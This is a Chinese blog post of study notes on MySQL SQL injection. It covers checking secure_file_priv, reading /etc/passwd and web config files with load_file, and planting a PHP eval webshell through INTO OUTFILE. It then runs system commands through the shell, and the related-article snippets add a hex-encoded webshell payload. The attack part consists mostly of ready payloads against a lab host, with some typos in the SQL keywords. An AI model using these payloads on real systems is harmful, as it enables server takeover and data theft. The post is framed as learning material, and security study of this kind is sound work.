09-SQL注入--木马植入

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量300 收藏 3
点赞数 10
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianxiadiiw/article/details/136863126
版权

SQL查询注入

把数据库拖下来就成功一大半

sql注入进一步操作

文件读写及木马植入

一、读写权限确认

show global variables like '%secure';
查看mysql全局变量的配置,当输入以上命令后,结果为
secure_file_priv = 空的时候,任意读写
secure_file_priv = 某个路径的时候,只能在规定的那个路径下读写
secure_flie_priv = NULL不能读写

二、读文件

利用SQL语句读取系统文件,先读写常规文件(明确文件路径),如果能成功读取,则继续读取其他文件。

如果明确知道路径,则直接尝试爆破路径小的文件,如果连路径都不知道,则爆破路径。

#利用SQL
-1 union select 1,2,3,load_file("C:/windows/server/service.inf"),5,6
-1 union select 1,2,3,load_file("/etc/passwd"),5,6

/security/read.php?id=-1 union select 1,2,3,(select load_file("/opt/lampp/htdocs/security/common.php")),5,6

三、写入木马

http://192.168.74.133/security/read.php?id=-1 union select 1,2,3,"hellowoniu",5,6 into outfile
"/opt/lampp/htdocs/security/temp/muma.php"

-1 union select 1,2,3,4,5,"<?php phpinfo(); ?>" into outflie "D:/xamppnew/htdocs/security/muma.php"

如果列的数量未知,也可以不停地试,然后注入一次,访问一次,确认是否注入成功

-1 union select 1,2,3,4,5,"<?php @eval($_POST['a']); ?>" into outflie "D:/xamppnew/htdocs/security/muma.php"
一句话木马==》用来进行探测==》之后进行大马植入
<?php @eval($_POST['a']); ?>
eval可以将一段字符串当成代码来执行,如果用户可以直接将这段有效的PHP代码传入后台,则可以执行任意代码或指令
植入木马后可以执行以下命令
security/muma2.php?a=phpinfo();
security/muma2.php?a=echo date('Y-m-d' H:i:s');
security/muma.php?a=system('ifconfig');  #PHP执行指令

?php @eval($_POST['123456]) ?>

@表示后面即使执行错误,也不报错。

eval()函数表示括号内的语句字符串什么的全都当做代码执行。

$_POST['123123']表示从页面中获得123123这个参数值,即该木马密码为123123。

四、中国菜刀和冰蝎的使用

去找一个真实的网站存在SQL的漏洞==》怎么去找?只允许探测,不允许利用。

搜索引擎语法

谷歌hack

本篇文章只是作为学习使用,为学习笔记,

xuzhuoyang
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入——文件上传
heyingcheng的博客
03-11 2359
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
渗透测试-SQL注入-文件读写及木马植入
fjc0214的博客
12-08 501
因为我们不知道可写文件夹和可写路径,所以这个漏洞能利用的可能性很小。这是在我们自己搭建的环境中测试这个漏洞,我们先确定文件的读写权限,然后再进行文件读写。真实环境中,我们需要爆破出可读写的文件路径。
sql写shell原理_sql注入写入shell的条件
最新发布
2401_84281655的博客
05-17 798
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可写权限即secure_file_priv = ''配置为空原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置。
数据库select语句写入一句话木马遇到的问题
weixin_43618066的博客
11-17 840
问题1:window服务器上,遇到了 The MySQL server is running with the --secure-file-priv option so it cannot execute this statement错误。 原因:my.ini配置文件没有secure-file-priv=,或者是secure-file-priv=NULL,有可能是secure-file-priv=某一文件路径。 解决:配置文件添加:secure-file-priv="" 问题二:linux上遇到了 Acce
sql注入之into outfile语句写入一句话木马_sql的into outfile
2401_84103714的博客
04-04 965
3)要能用union4)对web目录有写权限5)select into outfile “绝对路径/文件名”3、实验步骤1)??> into outfile “文件路径”–+2)蚁剑、哥斯拉连接即可4、防御1)数据库连接账号不要用root权限解释:黑客获取root权限可以对服务器进行操作,最高权限造成了拥有所有可以操作的权限,对任意终端操作。2)php关闭报错模式解释:关闭报错模式无法获取数据库配置文件路径,没有路径就会降低攻击,只能另寻他法。
SQL注入木马上传
zgqtxwd的专栏
04-26 1154
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
03-详细解析过程-bravo-1.docx
04-15
任务目标是识别并解释恶意用户的活动,包括目录扫描、木马植入、文件读取、密码确认以及数据库连接。 1. **恶意目录扫描**:在分析`Bravo-1.pcapng`时,我们首先关注HTTP流量,寻找包含"404 Not Found"响应的请求。...
SQL注入攻击浅析.pdf
09-19
攻击者可以利用这些漏洞获取管理员权限,植入木马,窃取数据,甚至完全控制服务器。 危害性: SQL注入攻击可能导致严重后果,包括但不限于非法访问和修改数据库内容,篡改网页,创建新的系统或数据库账户,安装恶意...
sql注入提权拿服务器
12-06
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据时,导致恶意SQL代码可以被插入到数据库查询中。"sql注入提权拿服务器"这个话题涉及到利用SQL注入漏洞来提升权限并最终控制...
SQL注入与ASP木马上传的又一思路.txt
07-06
·中华隐者
SQL注入攻击原理和防范方法.pdf
09-19
- 木马植入:攻击者可能会在网站上上传恶意软件,控制服务器或传播病毒。 3. SQL注入攻击特点: - 广泛性:由于SQL是通用的数据库语言,几乎所有的Web应用都可能受到SQL注入的影响。 - 隐蔽性:攻击行为与正常请求...
mysql数据库木马查杀_Linux系统木马后门查杀方法详解
weixin_30607125的博客
02-08 456
木马和后门的查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:一、Web Server(以Nginx为例)1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:在nginx配置文件...
sql注入写shell
jingxiaoxiong459的博客
08-01 335
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
sql注入攻击详解(二)sql注入过程详解
cuiyaoqiang的博客
06-11 3531
在上篇博客中我们分析了sql注入的原理,今天我们就来看一下sql注入的整体过程,也就是说如何进行sql注入,由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是:1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行情况 4.发现WEB虚拟目录 5
SQL Server 数据库常见提权总结
m0_64481831的博客
03-28 2104
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权。
SQL高权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 558
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
SQL注入篇——一句话木马
爱国小白帽
01-08 6393
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
渗透测试技术:从SQL注入到内网渗透
同时也讨论了留后门的方法,如cmd劫持、启动脚本、木马植入以及利用shift&放大镜后门作为跳板。此外,还介绍了嗅探技术,如通过ARP欺骗和DNS欺骗在同网段挂马。内网渗透方面,涉及信息收集(如使用flashfxp、ie、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值